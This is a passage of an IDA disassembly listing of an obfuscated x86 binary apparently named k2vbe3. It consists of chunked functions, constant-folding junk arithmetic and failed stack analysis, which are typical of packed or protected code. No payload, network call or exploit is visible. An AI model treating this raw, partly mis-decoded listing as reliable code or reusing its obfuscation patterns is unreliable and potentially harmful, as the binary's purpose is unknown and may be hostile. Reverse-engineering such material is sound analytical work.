		jmp	loc_45B702
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_498. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	dword ptr [edi+2Fh], 1C870000h
		and	al, 0C1h
		retn	0E90Ah
; ---------------------------------------------------------------------------
		dd 1AFBh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_43FF44:				; CODE XREF: sub_441DCC+73FCj
		xchg	edx, [esp-4+arg_0]
		jmp	loc_44C46A
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------

loc_43FF4C:				; CODE XREF: k2vbe3.d:loc_455E26j
		xchg	eax, edi
		jmp	sub_4487D2
; ---------------------------------------------------------------------------

loc_43FF53:				; CODE XREF: k2vbe3.d:00455611j
		sub	edx, 0F3C233ABh

; =============== S U B	R O U T	I N E =======================================



sub_43FF59	proc near		; CODE XREF: k2vbe3.d:0044B533p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E175 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EB8E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004418E1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442C50 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044362D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004463D1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044678D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510C1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451403 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004516DE SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004530A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004550A5 SIZE 00000005 BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		pushf
		push	0F2CC399Ch
		pop	eax
		add	eax, 0AE280093h
		and	eax, 343C47F7h
		jmp	loc_4516DE
sub_43FF59	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43FF75:				; CODE XREF: k2vbe3.d:0044F3CCj
		jle	loc_44D2D6

; =============== S U B	R O U T	I N E =======================================



sub_43FF7B	proc near		; CODE XREF: k2vbe3.d:00451854p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00459C59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B31A SIZE 00000015 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		push	eax

loc_43FF81:				; CODE XREF: k2vbe3.d:loc_454F98j
		push	1C08BC5Eh

loc_43FF86:				; CODE XREF: k2vbe3.d:loc_4454E9j
		xchg	ecx, [esp+8+var_8]
		mov	eax, ecx
		jmp	loc_459C59
sub_43FF7B	endp


; =============== S U B	R O U T	I N E =======================================



sub_43FF90	proc near		; CODE XREF: k2vbe3.d:0044518Fj
					; sub_444D7B:loc_45B2DDp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CB75 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440B3E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443230 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D83 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443EAE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044513E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447F5E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00448E91 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044D46E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451911 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452FAA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00454760 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457590 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00458379 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B37C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C036 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jb	loc_452FAA
		mov	eax, [esp-4+arg_0]
		push	ecx
		push	edx
		pop	ecx
		xchg	ecx, [esp+0]
		jmp	loc_45C036
sub_43FF90	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_43FFA8:				; CODE XREF: sub_43DEBE+5E16j
		mov	[ebp+0], edx
		popf

loc_43FFAC:				; CODE XREF: sub_43DEBE:loc_443CCBj
		xor	esi, 976C994Bh

loc_43FFB2:				; CODE XREF: sub_454EDD-8E65j
		call	sub_44680D

loc_43FFB7:				; CODE XREF: k2vbe3.d:004546DBj
		jmp	nullsub_138
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538AB

loc_43FFBC:				; CODE XREF: sub_4538AB+Fj
		jmp	nullsub_386
; END OF FUNCTION CHUNK	FOR sub_4538AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_43FFC1:				; CODE XREF: sub_443A30:loc_44A729j
		js	loc_44B276
		sbb	eax, 0B130435Fh
		jmp	loc_4573F9
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_43FFD2:				; CODE XREF: sub_4461D5+2F46j
		push	offset loc_44BBCE
		jmp	loc_4450C0
; END OF FUNCTION CHUNK	FOR sub_4461D5

; =============== S U B	R O U T	I N E =======================================



sub_43FFDC	proc near		; CODE XREF: k2vbe3.d:0044FA77j
					; k2vbe3.d:00451054p

; FUNCTION CHUNK AT 00440442 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447C9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C75C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004566BD SIZE 00000017 BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_451759
		push	edi
		push	0A31B039Fh
		jmp	loc_447C9B
sub_43FFDC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D6A

loc_43FFF0:				; CODE XREF: sub_440D6A:loc_452AC3j
		xchg	ebp, [esp+0]
		push	7C6EE412h
		pop	ecx
		add	ecx, 40CC84Ch
		xor	ecx, 538A0DEAh
		jmp	loc_45179A
; END OF FUNCTION CHUNK	FOR sub_440D6A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C067

loc_44000A:				; CODE XREF: sub_43C067:loc_458693j
		sub	ecx, 0B3EE7311h
		rol	ecx, 0Fh
		call	sub_45156D
; END OF FUNCTION CHUNK	FOR sub_43C067
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_440018:				; CODE XREF: sub_45482D-1315Aj
		jmp	loc_45B7D4
; END OF FUNCTION CHUNK	FOR sub_45482D

; =============== S U B	R O U T	I N E =======================================



sub_44001D	proc near		; CODE XREF: k2vbe3.d:0043FDDAj
					; sub_43E135:loc_451F5Cp

arg_4		= dword	ptr  8

		xchg	ecx, [esp+0]
		pop	ecx
		pop	ecx
		xchg	ebx, [esp-8+arg_4]
		mov	ebp, ebx
		pop	ebx
		jmp	nullsub_26
sub_44001D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_44002D:				; CODE XREF: sub_4423D2:loc_43C89Ej
					; sub_4423D2-37E2j
		call	sub_44F1C4
; END OF FUNCTION CHUNK	FOR sub_4423D2
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_440032:				; CODE XREF: sub_456C15+10j
		jmp	loc_449889
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
		popf
		jmp	sub_456208
; ---------------------------------------------------------------------------

loc_44003D:				; CODE XREF: k2vbe3.d:00445318j
		xchg	edi, esi

loc_44003F:				; CODE XREF: k2vbe3.d:loc_44530Bj
		sub	edi, 0BB114692h
		xor	edi, 595C55A6h
		add	edi, 7F0CA831h
		xchg	edi, [esp]
		jmp	loc_45BCCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445159

loc_440059:				; CODE XREF: sub_445159:loc_43C95Cj
		pop	ebx
		xchg	ebx, [esp-4+arg_0]
		call	sub_448E56

locret_440062:				; CODE XREF: k2vbe3.d:loc_43F64Fj
		retn
; END OF FUNCTION CHUNK	FOR sub_445159
; ---------------------------------------------------------------------------

loc_440063:				; CODE XREF: k2vbe3.d:0044525Fj
		jmp	loc_458A3A
; ---------------------------------------------------------------------------

loc_440068:				; CODE XREF: k2vbe3.d:0043E6BBj
		jmp	loc_44C7A1
; ---------------------------------------------------------------------------

loc_44006D:				; DATA XREF: sub_43FDC1:loc_443870o
		call	sub_44128B
		mov	edx, 0DE6CF580h
		push	esi
		push	0EC6534E5h
		pop	esi
		sub	esi, 88213EEFh
		xor	esi, 1D3C585Ah
		or	esi, 0F7D0BEDFh

loc_440090:				; CODE XREF: k2vbe3.d:loc_44C21Ej
		jmp	loc_440B73
; ---------------------------------------------------------------------------

loc_440095:				; CODE XREF: k2vbe3.d:0043F4B4j
		jnz	loc_449405
		jmp	loc_44D305
; ---------------------------------------------------------------------------

loc_4400A0:				; DATA XREF: sub_43F20A+6o
		cmp	dword ptr [ebp-8], 0
		jz	loc_442405
		jmp	loc_457211
; ---------------------------------------------------------------------------

locret_4400AF:				; CODE XREF: k2vbe3.d:loc_44EA5Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_4400B0:				; CODE XREF: sub_446478+11C09j
		jmp	loc_459917
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4400B5:				; CODE XREF: sub_4424CF+4892j
					; k2vbe3.d:loc_447D44j
		jmp	nullsub_2
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454447

loc_4400BA:				; CODE XREF: sub_454447:loc_44B23Cj
		xchg	ebx, [esp+4+var_4]
		push	0
		push	offset sub_440F56
		jmp	nullsub_457
; END OF FUNCTION CHUNK	FOR sub_454447
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_4400C9:				; CODE XREF: sub_43F34C+29D7j
		jnz	loc_4569DD
		sbb	esi, 0DF47B28h
; END OF FUNCTION CHUNK	FOR sub_43F34C
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_4400D5:				; CODE XREF: sub_44E90D:loc_449A22j
		and	eax, 777982E6h
		xor	eax, 0DE2B21DEh
		add	eax, ebp
		add	eax, 57B4DC6Ch
		jmp	loc_44796A
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_4400EE:				; CODE XREF: sub_447664:loc_450DD2j
		sub	eax, 6DE2127Bh
		test	eax, 40000h
		jmp	loc_44AE8B
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD9D

loc_4400FF:				; CODE XREF: sub_44AD9D-1B86j
		or	ecx, 0F59523EFh
		add	ecx, 0B8D6ED01h
		add	eax, ecx
		pop	ecx
		call	sub_4551FC
		or	ecx, ebx
		shr	ebp, 9
		jmp	sub_441172
; END OF FUNCTION CHUNK	FOR sub_44AD9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585F2

loc_44011D:				; CODE XREF: sub_4585F2:loc_447568j
		jz	loc_45408A
		jmp	loc_44E689
; END OF FUNCTION CHUNK	FOR sub_4585F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_440128:				; CODE XREF: sub_44A0D7:loc_45C180j
		rol	ebx, 1Fh
		sub	ebx, 2C4A21F4h
		add	ebx, 3132EC04h
		push	offset sub_443865
		jmp	loc_44BDE5
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_440141:				; CODE XREF: sub_44B94B-AAF8j
		adc	ebp, 0E70AA0D8h
		popf

loc_440148:				; CODE XREF: sub_44B94B:loc_4554D7j
		push	0A8462DB9h
		pop	eax
		rol	eax, 0Eh
		add	eax, 58177C85h
		add	eax, ebp
		jmp	loc_44778E
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_44015E:				; CODE XREF: sub_444B3E+2812j
		jz	loc_44034C
		jmp	loc_4525A2
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5FF

loc_440169:				; CODE XREF: sub_45A5FF:loc_44D7E8j
		shl	ebx, 19h
		xor	ebp, ebx
		push	esi
		jmp	loc_457321
; END OF FUNCTION CHUNK	FOR sub_45A5FF
; ---------------------------------------------------------------------------

loc_440174:				; DATA XREF: k2vbe3.d:0044CCF1o
		xchg	ebx, [esp]
		push	1B22A527h
		xchg	esi, [esp]
		mov	edx, esi
		jmp	loc_44A24D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_440186:				; CODE XREF: sub_449DA2-A688j
		jl	loc_451663
; END OF FUNCTION CHUNK	FOR sub_449DA2
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_44018C:				; CODE XREF: sub_4486D7+1114Ej
		jmp	sub_455CC3
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_440191:				; CODE XREF: sub_44ED3C+7D81j
		jmp	loc_45A713
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
		sub	edx, 0CC0477B9h
		mov	[edx], ebx
		sub	eax, 67F6AFE0h
		jmp	loc_451663
; ---------------------------------------------------------------------------

loc_4401A9:				; DATA XREF: k2vbe3.d:0045C0EBo
		jb	loc_43ED8D
		cmp	ecx, 0F889CCD0h
		add	ebx, ecx
		cmp	edx, 0BB9B8D00h
		jmp	loc_44D3D7
; ---------------------------------------------------------------------------

loc_4401C2:				; CODE XREF: k2vbe3.d:loc_43C27Aj
		pop	edx
		or	edx, 0D208A701h
		sub	edx, 45E191D5h
		add	edx, 4C06BBECh
		xchg	edx, [esp]
		jmp	loc_44E577
; ---------------------------------------------------------------------------
		mov	eax, 0A7A44D83h
		push	ebx
		push	355CE036h
		pop	ebx
		and	ebx, 1A9C8C8Dh
		add	ebx, 0F028ACB3h
		call	sub_4409D3
; START	OF FUNCTION CHUNK FOR sub_41976B

loc_4401FA:				; CODE XREF: sub_41976B+32C0Fj
		jmp	loc_44EEF3
; END OF FUNCTION CHUNK	FOR sub_41976B

; =============== S U B	R O U T	I N E =======================================



sub_4401FF	proc near		; DATA XREF: k2vbe3.d:0044E812o

; FUNCTION CHUNK AT 0043ED7D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446EA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ADD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C286 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455814 SIZE 00000005 BYTES

		cmp	dword ptr [ebp-8], 0
		jz	loc_4467EA
		jmp	loc_446EA1
sub_4401FF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44020E:				; CODE XREF: sub_44B94B-C870j
		jnz	loc_43EF2E
		jmp	loc_4486A3
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_440219:				; CODE XREF: sub_43FE2A:loc_458E43j
		mov	[edi], ecx
; END OF FUNCTION CHUNK	FOR sub_43FE2A

; =============== S U B	R O U T	I N E =======================================



sub_44021B	proc near		; CODE XREF: sub_44921C:loc_44E858p
		xchg	edx, [esp+0]
		pop	edx
		add	esp, 4
		retn
sub_44021B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_440223:				; CODE XREF: sub_440C94:loc_45834Bj
		mov	[ecx], edi
		jmp	loc_43D05E
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------

loc_44022A:				; CODE XREF: k2vbe3.d:00447C25j
		jb	loc_44AB6E
		test	edi, ebx
		jmp	loc_4474A8
; ---------------------------------------------------------------------------
		test	ebp, 595BED6Fh

loc_44023D:				; CODE XREF: k2vbe3.d:004526A5j
		jmp	loc_441C1E
; ---------------------------------------------------------------------------
		push	ebx
		push	1E8C7E33h
		pop	ebx
		xor	ebx, 0EE958951h
		test	ebx, 8000h
		jmp	loc_455BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_44025A:				; CODE XREF: sub_44B870:loc_442120j
		and	eax, 0CE1F2C8Ch
		xor	eax, 0E18FF5A5h
		sub	eax, 10895021h
		add	eax, 0C4C9B9E4h
		add	eax, ebp
		add	eax, 20399AB8h
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_45B381
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44028B:				; CODE XREF: sub_446258+45CCj
		add	eax, 0F703117h
		xor	eax, 71D22073h
		call	sub_451759
		push	offset loc_441F63
		jmp	nullsub_269
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4402A6:				; CODE XREF: sub_447E07:loc_449347j
		jnz	loc_456AD6
		jmp	loc_443335
; END OF FUNCTION CHUNK	FOR sub_447E07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_4402B2:				; CODE XREF: sub_444B3E+14350j
		jmp	loc_451FE2
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_4402B7:				; CODE XREF: k2vbe3.d:0043C774j
		jmp	sub_442D04
; ---------------------------------------------------------------------------
		call	sub_44316D
; START	OF FUNCTION CHUNK FOR sub_455F6B

loc_4402C1:				; CODE XREF: sub_455F6B+1101j
		jmp	loc_445277
; END OF FUNCTION CHUNK	FOR sub_455F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_4402C6:				; CODE XREF: sub_43DEBE:loc_44B705j
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
		add	esi, 54F1BEB2h
		sub	esi, 8F0E0C8Dh
		or	esi, 47361BBEh
		jmp	loc_43C39A
; END OF FUNCTION CHUNK	FOR sub_43DEBE

; =============== S U B	R O U T	I N E =======================================



sub_4402E3	proc near		; CODE XREF: sub_444944+13p
					; k2vbe3.d:004453E7j

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi

loc_4402E7:				; CODE XREF: k2vbe3.d:loc_43D691j
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_4436CE
sub_4402E3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4402EF	proc near		; DATA XREF: sub_4524D2:loc_4424D8o

; FUNCTION CHUNK AT 0044C386 SIZE 0000000E BYTES

		jnz	loc_44C386
		jmp	loc_44C17A
sub_4402EF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4402FA	proc near		; CODE XREF: sub_45530F-18E25p
					; k2vbe3.d:0044115Fp ...

; FUNCTION CHUNK AT 00447423 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A89D SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044A8A4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450930 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004513C4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456632 SIZE 00000018 BYTES

		call	sub_43FE0A

loc_4402FF:				; CODE XREF: sub_44469A-6176j
		add	esi, 0FFE5300h
		xor	ecx, edx
		jmp	loc_456632
sub_4402FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44030C:				; CODE XREF: k2vbe3.d:0044669Fj
		push	98691A6Dh
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_440311:				; CODE XREF: sub_446E24-796j
		xor	esi, 553D491Bh
		add	esi, 0A1F3808h
		call	sub_443795
; END OF FUNCTION CHUNK	FOR sub_446E24
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_440322:				; CODE XREF: sub_44662B+678Fj
		jmp	loc_4595A7
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_440327:				; CODE XREF: sub_43DFE1+BA74j
		jmp	loc_453C90
; END OF FUNCTION CHUNK	FOR sub_43DFE1

; =============== S U B	R O U T	I N E =======================================



sub_44032C	proc near		; CODE XREF: sub_44945C:loc_442F16p
					; k2vbe3.d:0045B6D7j

; FUNCTION CHUNK AT 004491EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E7F SIZE 00000012 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	370211ECh
		jmp	loc_4491EB
sub_44032C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44033B:				; CODE XREF: sub_4580DF:loc_446A07j
		jz	sub_45BE94
		jmp	loc_44EC62
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_440346:				; CODE XREF: sub_4432B0+17285j
		pushf
		shr	ebp, 9
		mov	edx, ebx

loc_44034C:				; CODE XREF: sub_444B3E:loc_44015Ej
		push	esi
		push	726E4F7Fh
		pop	esi
		jmp	loc_459C2E
; END OF FUNCTION CHUNK	FOR sub_4432B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_440358:				; CODE XREF: sub_451CF1:loc_457CFBj
		jz	loc_446155
; END OF FUNCTION CHUNK	FOR sub_451CF1
; START	OF FUNCTION CHUNK FOR sub_447383

loc_44035E:				; CODE XREF: sub_447383+1DFj
		jmp	loc_4405DE
; END OF FUNCTION CHUNK	FOR sub_447383
; ---------------------------------------------------------------------------
		xchg	ecx, edi
		mov	esi, 5E0689AFh
		push	0E9B6C5D9h
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_44036F:				; CODE XREF: sub_44E481:loc_443A7Ej
		jmp	loc_44F068
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458725

loc_440374:				; CODE XREF: sub_458725-2AE2j
		add	ebx, 0FEA90120h
		cmp	ebx, 0C879F643h
		jmp	loc_4411B0
; END OF FUNCTION CHUNK	FOR sub_458725
; ---------------------------------------------------------------------------
		jz	loc_458AA4
		jmp	sub_444966
; ---------------------------------------------------------------------------
		and	edx, 0FBD69D6Dh
		jmp	sub_4412A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44039B:				; CODE XREF: sub_449372+1EF9j
					; sub_44B912+8CCCj
		test	esi, 7E5E8321h
		jmp	loc_43E730
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_4403A6:				; CODE XREF: sub_43E135+D4A2j
		not	ebx
		rol	ebp, 10h
		or	ecx, edi

loc_4403AD:				; CODE XREF: sub_43E135-1BB3j
					; sub_43E135:loc_442982j ...
		jmp	loc_44F656
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
		jmp	loc_4424EF
; ---------------------------------------------------------------------------
		sbb	ecx, 0E7E14009h
		jmp	sub_441DCC
; ---------------------------------------------------------------------------
		test	edx, 0F8337D9Eh
		jmp	loc_45340D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_4403CD:				; CODE XREF: sub_45B74D:loc_443C1Bj
					; sub_45B74D-17B20j
		sub	ecx, 9FA9E607h
		rol	ecx, 17h
		xor	ecx, 6AF72998h
		sub	ebx, ecx
		or	ecx, 27854EC9h
		xchg	edx, [esp+0]
		jmp	loc_45AD8B
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------

loc_4403EC:				; DATA XREF: sub_45B69B:loc_43F664o
		xchg	ebx, [esp]
		push	offset sub_454FA8
		jmp	loc_45173E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_4403F9:				; CODE XREF: sub_44067C-37BBj
		xchg	ebp, [eax]
		pushf

loc_4403FC:				; CODE XREF: sub_44067C-37C7j
		or	ebx, 0BD3F6A2Eh
		js	loc_448CE6

loc_440408:				; CODE XREF: sub_45B180+17j
		jmp	loc_459D09
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
		xchg	ebx, edi
		jmp	loc_448CDF
; ---------------------------------------------------------------------------
		jmp	ds:off_41E088
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44041A:				; CODE XREF: sub_44B94B+6F5Cj
		jmp	loc_44D07B
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_44041F:				; CODE XREF: sub_452D37:loc_43FA85j
					; k2vbe3.d:0044E4FEj ...
		push	offset loc_4482E1
		jmp	nullsub_168
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_440429:				; CODE XREF: sub_441885+1B50j
		shl	ebp, 1Dh
		jmp	loc_44462D
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_440431:				; CODE XREF: sub_44469A:loc_4598DDj
		sub	al, 99h
		call	sub_4582DD

loc_440438:				; CODE XREF: k2vbe3.d:0044DE89j
		jmp	loc_44CF8F
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418B4

loc_44043D:				; CODE XREF: sub_4418B4+5j
		jmp	nullsub_29
; END OF FUNCTION CHUNK	FOR sub_4418B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FFDC

loc_440442:				; CODE XREF: sub_43FFDC:loc_44C75Cj
		pop	edi

loc_440443:				; CODE XREF: k2vbe3.d:0044EFBEj
		push	offset loc_450834
		jmp	nullsub_535
; END OF FUNCTION CHUNK	FOR sub_43FFDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_44044D:				; CODE XREF: sub_43E135-1BADj
		jnz	loc_454EAA
		jmp	loc_459956
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_440458:				; CODE XREF: sub_443FC1:loc_450899j
		mov	edx, [ebp-4]
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jnz	loc_443261
		jmp	loc_456B29
; END OF FUNCTION CHUNK	FOR sub_443FC1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_306. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_440475:				; CODE XREF: sub_450CBF+Ej
		jmp	loc_455DFE
; END OF FUNCTION CHUNK	FOR sub_450CBF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_311. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543B0

loc_44047B:				; CODE XREF: sub_4543B0+3A15j
		jmp	loc_44E603
; END OF FUNCTION CHUNK	FOR sub_4543B0
; ---------------------------------------------------------------------------

loc_440480:				; CODE XREF: k2vbe3.d:00451BAFj
		jmp	locret_43FD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456471

loc_440485:				; CODE XREF: k2vbe3.d:004502F4j
					; sub_456471+9j
		jmp	loc_4518F6
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------

loc_44048A:				; DATA XREF: sub_450E86-A9CFo
		push	ecx
		push	61DB6CB7h
		pop	ecx
		xor	ecx, 0C6325D0Bh
		and	ecx, 379C2D0h
		or	ecx, 70D593A7h
		jmp	loc_4463D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AE2

loc_4404A8:				; CODE XREF: sub_448AE2:loc_455A1Bj
		call	sub_4508A3
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44EFF6
		jmp	loc_4562AD
; END OF FUNCTION CHUNK	FOR sub_448AE2
; ---------------------------------------------------------------------------
		popf
		jmp	sub_44B999
